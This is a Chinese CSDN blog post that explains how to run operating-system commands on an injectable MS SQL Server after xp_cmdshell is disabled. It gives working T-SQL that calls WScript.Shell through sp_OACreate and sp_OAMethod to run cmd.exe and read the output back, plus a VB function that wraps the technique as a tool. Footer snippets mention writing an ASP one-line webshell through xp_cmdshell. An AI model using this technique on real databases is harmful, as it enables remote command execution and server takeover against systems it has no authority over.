不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD命令

最新推荐文章于 2021-01-19 17:02:18 发布
最新推荐文章于 2021-01-19 17:02:18 发布
阅读量4.3k 收藏 1
点赞数
分类专栏: WEB应用程序安全 WEB 应用编程 网络安全专栏 文章标签: 服务器 sql cmd xp sql server output
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/langkew/article/details/91756
版权

我的BLOG里有一篇文章介绍了关于SQL注入的基本原理和一些方法。最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell来运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句:

EXEC master.dbo.xp_cmdshell 'dir c:/'

但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无法运行任何的cmd命令,很难查看对方计算机的文件、目录、开启的服务,也无法添加NT用户。

对此作过一番研究,后来我发现即使xp_cmdshell不可用了,还是有可能在服务器上运行CMD并得到回显结果的,这里要用到SQL服务器另外的几个系统存储过程:sp_OACreate,sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject可用。
sp_OACreate
在 Microsoft® SQL Server™ 实例上创建 OLE 对象实例。
语法
sp_OACreate progid, | clsid,
    objecttoken OUTPUT
    [ , context ]
sp_OAGetProperty
获取 OLE 对象的属性值。
语法
sp_OAGetProperty objecttoken,
    propertyname
    [, propertyvalue OUTPUT]
    [, index...]
sp_OAMethod
调用 OLE 对象的方法。
语法
sp_OAMethod objecttoken,
    methodname
    [, returnvalue OUTPUT]
    [ , [ @parametername = ] parameter [ OUTPUT ]
    [...n]]

思路:

先在SQL Server 上建立一个Wscript.Shell,调用其run Method,将cmd.exe执行的结果输出到一个文件中,然后再建立一个Scripting.FileSystemObject,通过它建立一个TextStream对象,读出临时文件中的字符,一行一行的添加到一个临时表中。

以下是相应的SQL语句


CREATE TABLE mytmp(info VARCHAR(400),ID IDENTITY (1, 1) NOT NULL)
DECLARE @shell INT
DECLARE @fso INT
DECLARE @file INT
DECLARE @isEnd BIT
DECLARE @out VARCHAR(400)
EXEC sp_oacreate 'wscript.shell',@shell output
EXEC sp_oamethod @shell,'run',null,'cmd.exe /c dir c:/>c:/temp.txt','0','true'
--注意run的参数true指的是将等待程序运行的结果,对于类似ping的长时间命令必需使用此参数。

EXEC sp_oacreate 'scripting.filesystemobject',@fso output
EXEC sp_oamethod @fso,'opentextfile',@file out,'c:/temp.txt'
--因为fso的opentextfile方法将返回一个textstream对象,所以此时@file是一个对象令牌

WHILE @shell>0
BEGIN
EXEC sp_oamethod @file,'Readline',@out out
INSERT INTO MYTMP(info) VALUES (@out)
EXEC sp_oagetproperty @file,'AtEndOfStream',@isEnd out
IF @isEnd=1 BREAK
ELSE CONTINUE
END

DROP TABLE MYTMP


请查阅SQL Server联机众书里的关于:
sp_OACreate,sp_OAMethod 和 sp_OAGetProperty,以及有关FSO,WScript的文章
另外如果你需要这个软件的示例请留下Email地址,留下地址的我都发了。

以下是一段实现功能的VB源代码:

'strCommand : 需要被调用的命令,如“dir c:/“
'strShell : 调用的Shell程序,可以为“cmd.exe /c“ 或 “command.com /c“

Pivate Function wsShellExec(ByVal strCommand As String, ByVal strShell As String) As String
On Error GoTo errhandle:
    Dim rsShell As New ADODB.Recordset
    Dim strResult As String
    objConn.Execute "DROP TABLE cmds0001"
    objConn.Execute "CREATE TABLE cmds0001 (Info varchar(400),ID INT IDENTITY (1, 1) NOT NULL )"
    Dim strScmdSQL As String
    strScmdSQL = "declare @shell int " & vbCrLf
    strScmdSQL = strScmdSQL & "declare @fso int " & vbCrLf
    strScmdSQL = strScmdSQL & "declare @file int " & vbCrLf
    strScmdSQL = strScmdSQL & "declare @isend bit " & vbCrLf
    strScmdSQL = strScmdSQL & "declare @out varchar(400) " & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oacreate 'wscript.shell',@shell output " & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oamethod @shell,'run',null,'" & strShell & " " & Trim(strCommand) & ">c:/BOOTLOG.TXT','0','true' " & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oacreate 'scripting.filesystemobject',@fso output " & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oamethod @fso,'opentextfile',@file out,'c:/BOOTLOG.TXT' " & vbCrLf
    strScmdSQL = strScmdSQL & "while @shell>0 " & vbCrLf
    strScmdSQL = strScmdSQL & "begin " & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oamethod @file,'Readline',@out out " & vbCrLf
    strScmdSQL = strScmdSQL & "insert into cmds0001 (info) values (@out) " & vbCrLf
    strScmdSQL = strScmdSQL & "exec sp_oagetproperty @file,'AtEndOfStream',@isend out " & vbCrLf
    strScmdSQL = strScmdSQL & "if @isend=1 break " & vbCrLf
    strScmdSQL = strScmdSQL & "Else continue " & vbCrLf
    strScmdSQL = strScmdSQL & "End "
    objConn.Execute strScmdSQL
   
    rsShell.Open "select * from cmds0001", objConn, 1, 1
    Do While Not rsShell.EOF
        strResult = strResult & rsShell("info") & vbCrLf
        rsShell.MoveNext
    Loop
   
    objConn.Execute "DROP TABLE cmds0001"
    wsShellExec = strResult
    Exit Function
errhandle:
    If Err.Number = -2147217900 Then
        Resume Next
    ElseIf Err.Number = -2147217865 Then
        Resume Next
    Else
        MsgBox Err.Number & Err.Description
    End If
   
End Function

evancss
关注
专栏目录
在有注入漏洞SQL服务器运行CMD命令
03-03
### 在有注入漏洞SQL服务器运行CMD命令 #### 概述 本文主要介绍如何在存在SQL注入漏洞的环境中利用特定技术执行操作系统级别的命令。这种技术通常被安全研究人员用于渗透测试场景,帮助评估网络环境的安全性。...
MS SQL入侵(小心 xp_cmdshell)
07-31
但是,如果服务器的安全配置不正确或者用户权限管理不善,那么攻击者就可能利用`xp_cmdshell`来执行任意系统命令,从而对服务器造成严重威胁。 #### 2. `xp_cmdshell`的潜在威胁 - **远程代码执行**:攻击者可以...
SQL 中常用存储过程xp_cmdshell运行cmd命令
weixin_30411239的博客
03-29 2313
目的: 使用SQL语句,在D盘创建一个文件夹myfile 首先查询系统配置 SELECT * FROM sys.configurations WHERE name='xp_cmdshell' OR name='show advanced options' GO 可以看到他们的值为0,无法配置 打开系统配置: USE master GORECONFIGURE -...
整理的一些有用的ASP注入相关的命令 BY pt007&solaris7
l0ng专栏
01-11 2874
整理的一些有用的ASP注入相关的命令 BY pt007&solaris7大家好 ,我们是pt007和solaris7,QQ:7491805/564935,欢迎高手前来交流:)。1、 用^转义字符来写ASP(一句话木马)文件的方法: http://192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo ^execut
xp_cmdshell支持在有注入漏洞SQL服务器运行CMD命令
神经质的盛宴的专栏
05-04 469
转载:http://www.rrclink.com/itjishu/qitajishu/2012-3-16/10476.html 利用扩展存储过程xp_cmdshell运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句: EXEC master.dbo.xp_cmdshell 'dir c:' 但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可
mysql xpcmdshell_MSSQL入侵恢复xp_cmdshell方法总结
weixin_39888180的博客
01-19 658
MSSQL弱口令入侵已经很罕见了,但在内网时有时还能用到,今天在搞机器的时候遇上一MSSQL2005,第一次见这错误信息,搜索到答案,贴在BLOG上以后遇上备用.-----------------------------------------------------------------------------------------------------------错误信息:SQL Ser...
不需xp_cmdshell支持在有注入漏洞sql服务器运行cmd命令_数据库安全
weixin_33720452的博客
03-17 101
即使xp_cmdshell不可用了,还是有可能在服务器运行CMD并得到回显结果的,这里要用到SQL服务器另外的几个系统存储过程:sp_OACreate,sp_OAGetProperty和sp_OAMethod。前提是服务器上的Wscript.shell和Scripting.FileSystemObject可用。 sp_OACreate 在 Microsoft? SQL Server? 实例上...
(原创)不需xp_cmdshell支持在有注入漏洞SQL服务器运行CMD命令
04-12 741
最让人感兴趣的也许就是前面介绍的利用扩展存储过程xp_cmdshell运行操作系统的控制台命令。这种方法也非常的简单,只需使用下面的SQL语句:EXEC master.dbo.xp_cmdshell dir c:/但是越来越多的数据库管理员已经意识到这个扩展存储过程的潜在危险,他们可能会将该存储过程的动态链接库xplog70.dll文件删除或改了名,这时侯许多人也许会放弃,因为我们无法运行
SQL注入中利用XP_cmdshell提权的用法
自由程序员(网络偏执狂)- epzk
07-23 4350
先来介绍一下子服务器的基本情况,windows 2000 adv server 中文版,据称打过了sp3,asp+iis+mssql 。首先扫描了一下子端口,呵呵,开始的一般步骤。端口21开放: FTP (Control)端口80开放: HTTP, World Wide Web端口135开放: Location Service端口139开放: NETBIOS Session Service端口
最详细的SQL注入相关的命令整理.txt
07-18
**解析:**通过执行`sp_addextendedproc`存储过程来添加一个新的扩展存储过程`xp_cmdshell`,这使得攻击者可以在目标服务器上执行任意命令。 **应用环境:**具有相应权限的SQL Server环境 **安全建议:**严格控制...
高级SQL注入shell,一般黑客不知道1
08-08
5. **写入一句话木马**:一旦找到Web根目录,攻击者通过`xp_cmdshell`执行命令,创建包含恶意脚本的一句话木马(如`a.asp`),等待受害者访问触发。 这个高级SQL注入方法展示了攻击者如何利用有限的权限(如public...
Python logging模块使用配置文件记录日志
热门推荐
程序设计与安全 @EVAN-CSS
06-01 2万+
良好的日志是应用程序调试、质量跟踪的重要线索,因此在应用开发过程中应当养成良好的日志记录习惯。在Python中内建了logging模块,可以使用该模块生成高质量的应用程序日志。基本用法默认情况下,logging将日志打印到屏幕,日志级别为WARNING;日志级别大小关系为:CRITICAL > ERROR > WARNING > INFO > DEBUG > NOTSET,当然也可以自己定义日志级别
边做边学Python Flask Web开发(4)-- 使用Jinjia2模板(上)
程序设计与安全 @EVAN-CSS
06-22 7921
概述Flask中我们通常使用Jinjia2模板语言来实现复杂的页面渲染,Jinja2 是一个现代的,设计者友好的,仿照 Django 模板的 Python 模板语言。 它速度快,被广泛使用,并且提供了可选的沙箱模板执行环境保证安全,它的特性有: 沙箱中执行,强大的 HTML 自动转义系统保护系统免受 XSS,模板继承,及时编译最优的 python 代码,可选提前编译模板的时间,易于调试。
边做边学Python Flask Web开发(5)-- 使用Jinjia2模板(中)
程序设计与安全 @EVAN-CSS
07-06 6720
上一篇介绍了Jinjia2模板系统的基本用法,本篇将深入对Jinjia2进行探讨,对网页设计中经常会用到的一些高级特性进行介绍。模板复用复用是网页设计非常常用的特性,比如我们的页面头部的网站名称和页尾的版权标识通常都是一样的,我们的菜单有时候在每个页面也都是一样的。作为一名程序员,重复做同样的事情是完全不可接受的。在Jinjia2中,通常可以使用继承、包含和宏三种特性来完成模板的利用。
VB实现AES(Rijndael)加密的方法
程序设计与安全 @EVAN-CSS
06-20 4615
软件名称:AES简单加密模块版本:1.0.0文件名:AESCipher.dll授权:免费用户接口:Public Function EncryptAES(ByVal StrIN As String, ByVal sKEY As String) As StringPublic Function DecryptAES(ByVal StrIN As String, ByVal sKEY As String
边做边学Python Flask Web开发(2)-- 使用VirtualEnv虚拟环境
程序设计与安全 @EVAN-CSS
06-02 4485
使用VirtualEnv虚拟环境概述说VirtualEnv是Python的一大神器不足为过,如果你在生活中也有那么一点点的“洁癖”,相信你会喜欢上这个东西。我们知道使用Python的过程中会安装各种库、包,甚至有时候还需要Python2和Python3两种环境混合使用,慢慢的你的Python运行环境会越来越臃肿,这倒还是其次,最可怕的是,有些应用会使用到某个Python包的特定版本...
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值